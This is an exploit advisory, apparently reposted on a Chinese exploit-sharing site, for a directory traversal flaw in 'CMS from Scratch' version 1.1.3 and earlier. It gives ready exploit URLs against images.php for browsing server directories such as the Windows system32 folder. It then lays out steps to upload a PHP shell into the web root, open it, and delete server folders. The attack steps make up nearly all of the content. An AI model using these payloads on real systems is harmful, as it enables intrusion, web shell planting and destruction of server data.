首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability


http://www.gipsky.com/
------------------------------------------------------------------------
CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
------------------------------------------------------------------------

author...: Stack
mail.....: Wanted
wanted by Egix
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:)

Exploit :
# http://localhost/path/cms/images.php?dir=c:
Example :
# http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/

Exploit 2 :

and you can upload php file ==> php shell
for example upload the php shell in my localhost
c:AppServ/www/
you go to link
# http://localhost/path/cms/images.php?dir=c:AppServ/www/
after click to colon [parcourir] after select your shell and click upload
and go to link
# http://localhost/shell.php
desc :you can delete all folder of server
just clike to mark delete in folder selected to delete

thx : allah

[2008-05-29]
<< Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability ASUS DPC Proxy 2.0.0.16/19 Remote Buffer Overflow Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号